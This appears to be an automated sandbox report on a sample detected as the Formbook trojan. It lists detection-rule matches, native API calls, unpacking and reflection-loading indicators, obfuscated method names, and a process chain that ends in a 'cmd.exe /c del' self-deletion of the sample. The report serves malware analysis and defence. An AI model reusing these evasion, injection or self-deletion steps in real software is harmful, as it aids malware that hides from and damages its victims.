          Source: 00000001.00000002.1253892439.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: 2FcJgghyXg.exe PID: 7656, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: 2FcJgghyXg.exe PID: 7700, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: msdt.exe PID: 7736, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 1_2_0105D57C1_2_0105D57C
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 1_2_085061581_2_08506158
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0041E1112_2_0041E111
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0041E1A22_2_0041E1A2
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_004012092_2_00401209
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0041E3812_2_0041E381
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0041E5172_2_0041E517
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_00402D872_2_00402D87
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0041D5932_2_0041D593
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_00409E4D2_2_00409E4D
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_00409E502_2_00409E50
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0041DEE32_2_0041DEE3
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0185E1B62_2_0185E1B6
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179F1132_2_0179F113
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017BB1002_2_017BB100
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_018621062_2_01862106
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_018700A32_2_018700A3
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017B70102_2_017B7010
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0186F0FF2_2_0186F0FF
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0186A0122_2_0186A012
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A00A02_2_017A00A0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017F734A2_2_017F734A
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017BE3402_2_017BE340
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A13C02_2_017A13C0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0184D2802_2_0184D280
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017CB2202_2_017CB220
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179D2EC2_2_0179D2EC
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_018672312_2_01867231
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0187024E2_2_0187024E
          Source: C:\Windows\explorer.exeCode function: 3_2_088972323_2_08897232
          Source: C:\Windows\explorer.exeCode function: 3_2_0888D0823_2_0888D082
          Source: C:\Windows\explorer.exeCode function: 3_2_088960363_2_08896036
          Source: C:\Windows\explorer.exeCode function: 3_2_0889A5CD3_2_0889A5CD
          Source: C:\Windows\explorer.exeCode function: 3_2_0888ED023_2_0888ED02
          Source: C:\Windows\explorer.exeCode function: 3_2_088949123_2_08894912
          Source: C:\Windows\explorer.exeCode function: 3_2_08891B303_2_08891B30
          Source: C:\Windows\explorer.exeCode function: 3_2_08891B323_2_08891B32
          Source: C:\Windows\explorer.exeCode function: 3_2_0E7092323_2_0E709232
          Source: C:\Windows\explorer.exeCode function: 3_2_0E703B303_2_0E703B30
          Source: C:\Windows\explorer.exeCode function: 3_2_0E703B323_2_0E703B32
          Source: C:\Windows\explorer.exeCode function: 3_2_0E7080363_2_0E708036
          Source: C:\Windows\explorer.exeCode function: 3_2_0E6FF0823_2_0E6FF082
          Source: C:\Windows\explorer.exeCode function: 3_2_0E7069123_2_0E706912
          Source: C:\Windows\explorer.exeCode function: 3_2_0E700D023_2_0E700D02
          Source: C:\Windows\explorer.exeCode function: 3_2_0E70C5CD3_2_0E70C5CD
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: String function: 0179B910 appears 46 times
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0041A350 NtCreateFile,2_2_0041A350
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0041A400 NtReadFile,2_2_0041A400
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0041A480 NtClose,2_2_0041A480
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0041A530 NtAllocateVirtualMemory,2_2_0041A530
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0041A3FB NtReadFile,2_2_0041A3FB
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0041A3A2 NtReadFile,2_2_0041A3A2
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017E2B20 NtClose,LdrInitializeThunk,2_2_017E2B20
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017E2BB0 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_017E2BB0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017E2A90 NtReadFile,LdrInitializeThunk,2_2_017E2A90
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017E2DB0 NtQuerySystemInformation,LdrInitializeThunk,2_2_017E2DB0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017E2D90 NtDelayExecution,LdrInitializeThunk,2_2_017E2D90
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017E2C60 NtQueryInformationToken,LdrInitializeThunk,2_2_017E2C60
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017E2C30 NtFreeVirtualMemory,LdrInitializeThunk,2_2_017E2C30
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017E2CF0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_017E2CF0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017E2CD0 NtMapViewOfSection,LdrInitializeThunk,2_2_017E2CD0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017E2F70 NtResumeThread,LdrInitializeThunk,2_2_017E2F70
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017E2F50 NtProtectVirtualMemory,LdrInitializeThunk,2_2_017E2F50
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017E2FA0 NtCreateFile,LdrInitializeThunk,2_2_017E2FA0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017E2E60 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_017E2E60
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017E2E40 NtReadVirtualMemory,LdrInitializeThunk,2_2_017E2E40
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017E2EF0 NtCreateSection,LdrInitializeThunk,2_2_017E2EF0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017E3050 NtSetValueKey,2_2_017E3050
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017E4320 NtSetContextThread,2_2_017E4320
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017E3590 NtCreateMutant,2_2_017E3590
          Source: C:\Windows\explorer.exeCode function: 3_2_08898E12 NtProtectVirtualMemory,3_2_08898E12
          Source: C:\Windows\explorer.exeCode function: 3_2_08897232 NtCreateFile,3_2_08897232
          Source: C:\Windows\explorer.exeCode function: 3_2_08898E0A NtProtectVirtualMemory,3_2_08898E0A
          Source: 2FcJgghyXg.exe, 00000001.00000002.1252377746.0000000002B31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEvor.dll0 vs 2FcJgghyXg.exe
          Source: 2FcJgghyXg.exe, 00000001.00000002.1258937679.00000000053C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameEvor.dll0 vs 2FcJgghyXg.exe
          Source: 2FcJgghyXg.exe, 00000001.00000002.1251054886.0000000000C9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 2FcJgghyXg.exe
          Source: 2FcJgghyXg.exe, 00000001.00000002.1260071587.0000000008480000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 2FcJgghyXg.exe
          Source: 2FcJgghyXg.exe, 00000001.00000002.1253892439.000000000401F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 2FcJgghyXg.exe
          Source: 2FcJgghyXg.exe, 00000001.00000000.1232031634.00000000006F6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamexYQq.exeB vs 2FcJgghyXg.exe
          Source: 2FcJgghyXg.exe, 00000002.00000002.1322759812.000000000189D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 2FcJgghyXg.exe
          Source: 2FcJgghyXg.exe, 00000002.00000002.1324284737.00000000033A5000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs 2FcJgghyXg.exe
          Source: 2FcJgghyXg.exeBinary or memory string: OriginalFilenamexYQq.exeB vs 2FcJgghyXg.exe
          Source: 2FcJgghyXg.exeReversingLabs: Detection: 39%
          Source: 2FcJgghyXg.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\2FcJgghyXg.exe C:\Users\user\Desktop\2FcJgghyXg.exe
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess created: C:\Users\user\Desktop\2FcJgghyXg.exe C:\Users\user\Desktop\2FcJgghyXg.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\2FcJgghyXg.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess created: C:\Users\user\Desktop\2FcJgghyXg.exe C:\Users\user\Desktop\2FcJgghyXg.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\2FcJgghyXg.exe"Jump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2FcJgghyXg.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@173/1@4/6
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, K2wBRMjdm6agx0EcTv.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, K2wBRMjdm6agx0EcTv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, qCKfVZDTTLbfMY8TSL.csSecurity API names: _0020.SetAccessControl
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, qCKfVZDTTLbfMY8TSL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, qCKfVZDTTLbfMY8TSL.csSecurity API names: _0020.AddAccessRule
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, K2wBRMjdm6agx0EcTv.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, K2wBRMjdm6agx0EcTv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, qCKfVZDTTLbfMY8TSL.csSecurity API names: _0020.SetAccessControl
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, qCKfVZDTTLbfMY8TSL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, qCKfVZDTTLbfMY8TSL.csSecurity API names: _0020.AddAccessRule
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, qCKfVZDTTLbfMY8TSL.csSecurity API names: _0020.SetAccessControl
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, qCKfVZDTTLbfMY8TSL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, qCKfVZDTTLbfMY8TSL.csSecurity API names: _0020.AddAccessRule
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, K2wBRMjdm6agx0EcTv.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, K2wBRMjdm6agx0EcTv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 2FcJgghyXg.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7764:120:WilError_03
          Source: 1.2.2FcJgghyXg.exe.2b81d34.0.raw.unpack, WFD.csCryptographic APIs: 'CreateDecryptor'
          Source: 1.2.2FcJgghyXg.exe.2b81d34.0.raw.unpack, WFD.csCryptographic APIs: 'CreateDecryptor'
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: 2FcJgghyXg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 2FcJgghyXg.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: 2FcJgghyXg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: msdt.pdbGCTL source: 2FcJgghyXg.exe, 00000002.00000002.1324284737.0000000003350000.00000040.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.2497776864.00000000007E0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: xYQq.pdbSHA256K source: 2FcJgghyXg.exe
          Source: Binary string: wntdll.pdbUGP source: 2FcJgghyXg.exe, 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.2500706865.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.2500706865.0000000004DBD000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000003.1328099105.0000000004ADF000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000004.00000003.1322862387.0000000004924000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: 2FcJgghyXg.exe, 2FcJgghyXg.exe, 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.2500706865.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.2500706865.0000000004DBD000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000003.1328099105.0000000004ADF000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000004.00000003.1322862387.0000000004924000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msdt.pdb source: 2FcJgghyXg.exe, 00000002.00000002.1324284737.0000000003350000.00000040.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.2497776864.00000000007E0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: xYQq.pdb source: 2FcJgghyXg.exe

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: 2FcJgghyXg.exe, flogin.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, qCKfVZDTTLbfMY8TSL.cs.Net Code: QtR7YmfDPZ System.Reflection.Assembly.Load(byte[])
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, qCKfVZDTTLbfMY8TSL.cs.Net Code: QtR7YmfDPZ System.Reflection.Assembly.Load(byte[])
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, qCKfVZDTTLbfMY8TSL.cs.Net Code: QtR7YmfDPZ System.Reflection.Assembly.Load(byte[])
          .NET source code contains method to dynamically call methods (often used by packers)
          Source: 1.2.2FcJgghyXg.exe.2b81d34.0.raw.unpack, WFD.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 1_2_0105E9B8 pushfd ; retf 1_2_0105E9B9
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0041E914 push ecx; ret 2_2_0041E91C
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_004169F3 push es; iretd 2_2_00416A37
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_00416A3B push ebp; retf 2_2_00416A3C
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_00416A3E push ebx; retf 2_2_00416A77
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0041D4F2 push eax; ret 2_2_0041D4F8
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_004164F6 push ds; retf 2_2_004164FC
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0041D4FB push eax; ret 2_2_0041D562
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0041D4A5 push eax; ret 2_2_0041D4F8
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0041D55C push eax; ret 2_2_0041D562
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_004176ED push edi; retf 2_2_004176EE
          Source: C:\Windows\explorer.exeCode function: 3_2_0889A9B5 push esp; retn 0000h3_2_0889AAE7
          Source: C:\Windows\explorer.exeCode function: 3_2_0889AB02 push esp; retn 0000h3_2_0889AB03
          Source: C:\Windows\explorer.exeCode function: 3_2_0889AB1E push esp; retn 0000h3_2_0889AB1F
          Source: C:\Windows\explorer.exeCode function: 3_2_0E70CB1E push esp; retn 0000h3_2_0E70CB1F
          Source: C:\Windows\explorer.exeCode function: 3_2_0E70CB02 push esp; retn 0000h3_2_0E70CB03
          Source: C:\Windows\explorer.exeCode function: 3_2_0E70C9B5 push esp; retn 0000h3_2_0E70CAE7
          Source: 2FcJgghyXg.exeStatic PE information: 0xA9C135F0 [Thu Apr 1 02:22:40 2060 UTC]
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, srHQXlz7jnNiCOT24M.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bhWc8hQNPc', 'ig0c40IXah', 'f40cWtj7Th', 'DcBcMvmsBF', 'zV5c2Fj5qC', 'EH7ccvjiF6', 'Q1dcuCOGVd'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, JneaKoxYOwZYUwgJbY.csHigh entropy of concatenated method names: 'u4OMbjVaor', 'J1pMBXKvNU', 'j4G29mnpAh', 'lCc26jRUKW', 'UDmMNmq1Ti', 'yBUMI0wMqk', 'rqKM5C3Jp5', 'xuCMHa4avC', 'QSYMsFhA2y', 'Gt0MVKc5Am'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, snN1xF7S4RmgbgcW05.csHigh entropy of concatenated method names: 'nWr6Z2wBRM', 'hm66Dagx0E', 'L6f6Fwjdsx', 'kxY61BmBjN', 'z0L64AeV6l', 'SZN6WDd6KI', 'O2mWrrgYu6uEEdvrJG', 'm1nwloGSeqL0RUba8m', 'o9F66HOKkA', 'gaS6S8YfhW'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, myKyekVHN8n3nqSuWK.csHigh entropy of concatenated method names: 'ToString', 'jnbWNlMop9', 'NVoWPQiL3N', 'N9SWmNAaui', 'Lm9WolqIEh', 'M5qWJnIfEl', 'XT9WrXkObY', 'c8fWl26Awg', 'oVCWfvJ85h', 'C1lWQRg35f'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, S6lVZNGDd6KIuoI9tW.csHigh entropy of concatenated method names: 'PEqEL3Et1n', 'MlEEakkbt7', 'QlXEdqg1hx', 'fvcEZ4d43E', 'KdCEDAPSir', 'aPOdhjP0mJ', 'bqCdxtybLI', 'ItqdyxqhDm', 'CrDdb50sdp', 'QGydpNse3d'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, JPpxSbptHsfMShtm7I.csHigh entropy of concatenated method names: 'F8Y2Gvd2B6', 'zQe2P7QBJB', 'cVd2mrx8Hp', 'zb82okjWP3', 'b5W2HaWllR', 'qvO2J2VKtj', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, DOTAclT6fwjdsxDxYB.csHigh entropy of concatenated method names: 'CfQgRK1rGf', 'vWhgwcY9hS', 'oK0gjFTEhr', 'YkQgTKboc5', 'eljg4OsR1Q', 'myUgWQCOMe', 'T5dgMiVORV', 'rmSg2owPZr', 'cY0gcQ7Q0I', 'kmFgu9plgm'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, lVaG3Sl3dvGlBTGm5Q.csHigh entropy of concatenated method names: 'BOCZAAZ3dO', 'jwtZgmwfua', 'c0OZEyUPBF', 'vjsEByUp24', 'F2aEzbtmHO', 'WpKZ9qUaql', 'KRAZ6H1980', 'gCoZq8VGbJ', 'LI0ZSbK9yb', 'eTtZ74NG2o'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, OR1PhfbJmeXRkgxLeU.csHigh entropy of concatenated method names: 'w472A0jqI5', 'vAZ2aZP5Lh', 'n7q2gi284x', 'bq92dE01kg', 'o6V2Eqgrwe', 'QgV2ZdlacF', 'ur52DuwRUJ', 'ioV2C8mAhn', 'zNE2FmYnC8', 'zFp21TxKbr'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, yoyd7cHYYLaJbiic6L.csHigh entropy of concatenated method names: 'lWp4OCeOLx', 'SJx4IEbsll', 'wGM4HK9BD8', 'JY04syioUd', 'tRv4PKkQYh', 'brY4m541h6', 'Xu14oH6rke', 'jCt4JbsQuT', 'xHn4rX75cx', 'tZM4l5aclk'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, FAwW796SXsNRBegtEvs.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mvIuHktqQG', 'ubKus5gh1t', 'XhOuVyLHlT', 'WCXu0RYC6Q', 'iyBuh5vNXb', 'TgwuxFlqpW', 'lK7uyuugO4'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, Q6n3y0QYd7oU3LmetC.csHigh entropy of concatenated method names: 'dUSZtlo0Uy', 'VQBZeULg2j', 'nGnZYG4M51', 'dNjZRmmIh7', 'I8AZixR4Fk', 'S5hZw5Tynv', 'pMuZUOwEbj', 'GjxZj5sjdT', 'c41ZTDYIrt', 'txgZkW5NB9'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, qCKfVZDTTLbfMY8TSL.csHigh entropy of concatenated method names: 'E3NSLUBZZq', 'bYTSAM5Fsi', 'xfDSaD9UWq', 'i00SgchJBh', 'DgCSdkvHyh', 'POUSENtJfV', 'tgeSZXvraH', 'orSSDx04dF', 'gtaSCxdGlL', 'kAZSFskPts'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, aeih4850tCygqgvN25.csHigh entropy of concatenated method names: 'GH38jjxGsP', 'Iuy8TbhtZp', 'Aph8Ge7fDh', 'Q2q8PUGGFa', 'JwY8o7r2uc', 'jsh8J9fTUZ', 'ogW8lNtVw9', 'u4A8fSjkdL', 'FDQ8OhR4Y1', 'BuI8NKKi6y'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, G7ZMqUarOIYkDdbkRW.csHigh entropy of concatenated method names: 'Dispose', 'yRp6pjWoZu', 'cTFqP2B6sh', 'gHSttBZ1hj', 'gNR6B1PhfJ', 'IeX6zRkgxL', 'ProcessDialogKey', 'yUJq9PpxSb', 'xHsq6fMSht', 'H7Iqq8RPRN'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, Iu4ZYc69hOfmwAxsFlO.csHigh entropy of concatenated method names: 'oowctZ0Zme', 'kYMceA13dG', 'iUqcYp9iPH', 'MJUcRt2LGR', 'h9ycief1Hi', 'DOIcwi0Jmb', 'PYZcUaPcT7', 'lBEcjp1ulk', 'vyfcToylkN', 'HelckP2fG2'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, qFJdNBqjj4uODIWIhK.csHigh entropy of concatenated method names: 'ypwYXU9hB', 'tltRemsu9', 'A31wk6CLq', 'A9HUrDerc', 'yLST0DSKo', 'qVLk70ob7', 'hmwAOixhJRWvidKuMd', 'bE4AGxFKj6rgvMfIYZ', 'ekl2usjMu', 'SAsupHHAj'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, K2wBRMjdm6agx0EcTv.csHigh entropy of concatenated method names: 'y2WaHFmxsT', 'kHnasieWZq', 'OaUaVY4RYL', 'H5ga0t6T4K', 'VJ3ahU8tXc', 'eDRaxQTXli', 'tuDayjuYJf', 'UScabNrYPg', 'jLtapQJobC', 'GrBaBGssEF'
